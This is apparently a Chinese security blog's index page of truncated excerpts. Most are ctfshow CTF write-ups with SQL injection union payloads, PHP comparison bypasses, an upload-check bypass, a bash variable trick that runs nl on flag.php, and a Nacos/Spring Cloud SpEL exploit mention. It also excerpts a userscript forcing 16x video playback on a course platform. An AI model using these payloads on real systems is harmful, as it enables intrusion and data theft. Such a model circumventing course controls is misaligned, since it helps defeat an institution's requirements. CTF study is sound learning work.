如果你用了我之前发的脚本,你就会发现这个图片删后缀解析功能失效了。不仅如此,以前用过生成的所有图片也失效了。如果预览的话,会提示如下:但是当多次访问之后就会提示下载,但是图片仍然不会解析。本来以为用不了了,打算搞个接口自己刷新,但是教程太乱了,而且感觉应该还有绕过的办法。经过多次调试发现,这里有一个referer验证。没有referer的访问是会被403的。因此这个问题就变成了如何让访问具有referer验证,或者说不让他验证。在网上查了很久发现一段代码: 1<meta name="referrer" content="no-referrer" /> 用它来拒绝referer的请求。原文提示说,需要放在主题文件下的post.ejs文件。如果到这里,你的博客正好有.ejs文件。那就少了很多折腾。以我的为例(butterfly)这个主题文件下的内容全是以.pug格式为后缀,因此,原封不动照抄是会一片红的。研究了挺长时间,找了找语法,得到了一种修改办法。 1meta(name="referrer", content=&q ...
web191跟上题一样,由于换了一章,就重新叙述一下。布尔盲注需要先找到一个可改变的注入点。比如: admin' and 0#时返回的是用户名不存在 admin' and 1#返回的是密码错误 由此编写脚本:这题还是用是190的脚本即可直接使用paayload: 123456789101112131415161718192021222324252627282930313233343536373839# -*- encoding: utf-8 -*-"""@File : SQL布尔盲注2.py @Contact : 2997453446@qq.com@Blog : natro92.github.io @Modify Time @Author @Version @Desciption------------ ------- -------- -----------2023/7/11 22:02 natro92 1.0 None"& ...
web171 1$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 三栏一眼丁真,直接内容拼入即可。 1-1' union select 1,2,database() --+ 查询库名: 1-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ information_schema,test,mysql,performance_schema,ctfshow_web查询表名: 1-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ...
Python
未读用了语雀的md编辑器,感觉typora有点用不惯,但是语雀的到处图片会有限制,虽然能够浏览,但是使用hexo之后就不行了,寻找了几个方法,最好用的就是修改图片格式,将地址后的参数删除掉。一个一个改太费劲了,因此写了一个简单的python脚本来代替机械劳动。 12345678910111213141516171819202122232425262728293031323334# -*- encoding: utf-8 -*-"""@File : YuQueShareLink.py@Contact : 2997453446@qq.com@Blog : natro92.github.io@Modify Time @Author @Version @Desciption------------ ------- -------- -----------2023/5/16 21:04 natro92 1.0 将语雀链接在导出到博客时可以正常使用""" ...
Python
未读 前言:BYD智慧树嘎嘎刷视频,1.5倍速太浪费时间了,通过查看前端代码发现了一种逃课方法。可以通过修改播放器的倍速播放功能来实现加速播放效果。 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849// ==UserScript==// @name 智慧树16倍速自动脚本// @namespace http://natro92.github.io// @version 0.1// @description 自动修改脚本倍速x1.5->x16// @author natro92// @match *://*.zhihuishu.com/*// @icon https://www.google.com/s2/favicons?sz=64&domain=zhihuishu.com// @grant GM_log// @require https://co ...
web151、web152前端校验根据提示,检验写在了前端。 1234567891011121314151617181920layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#result").html("文件上传成功,路径:"+res.msg); }else{ $("#result").html("文件上传失败,失败原因:"+res.msg); } } ...
web10612345678910highlight_file(__FILE__);include("flag.php");if(isset($_POST['v1']) && isset($_GET['v2'])){ $v1 = $_POST['v1']; $v2 = $_GET['v2']; if(sha1($v1)==sha1($v2) && $v1!=$v2){ echo $flag; }} 数组和转为0e都行,这里图省事使用了数组绕过。 web107 parse_str12345678910111213highlight_file(__FILE__);error_reporting(0);include("flag.php");if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 ...
战队答题情况排名:282 解题列表Web BackendService Pwn 烧烤摊儿 funcanary Misc 签到卡 pyshell 网络安全人才实战能力评价现状调查问卷 Re babyRE ezAndroid Crypto 基于国密SM2算法的密钥密文分发 Sign_in_passwd WebBackendService在nacos权限绕过漏洞,网上找了一个payloadnacos抓包,修改返回包中参数,登录https://xz.aliyun.com/t/11493#toc-5对源码进行审计发现springcloud3.05 spel注入漏洞,在新建配置文件,名为backcfg 12345678910111213141516171819202122232425262728{ "spring": { "cloud": { "gateway": { "routes": [ { ...
web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }} 遇事不决先试试数组捏,?num[]=1 web9012345678910111213include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="447 ...
参考链接: https://blog.csdn.net/weixin_46081055/article/details/121721209 web118题目里面提示了:flag in flag.php随便提交一点东西,看到源代码中:post上传然后system执行,但是没有回显。但是输入会出现evil input,因此想到可能是有过滤。fuzz一下:发现有的字符被过滤掉了:剩余的字符有A-Z,;:{}?#$_,@~看了wp学了一个新姿势:以下是在本地测试的。我们到web测试一下:web上的用户名末尾为l,path末尾为n,因此我们可以尝试组合: 1${PATH:~A}${PWD:~A}$IFS????.??? 组合成为nl查找文件。当然也有使用别的字段的方法: 12345SHLVL是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时${SHLVL}=1,然后在此shell中再打开一个shell时${SHLVL}=2。${ ...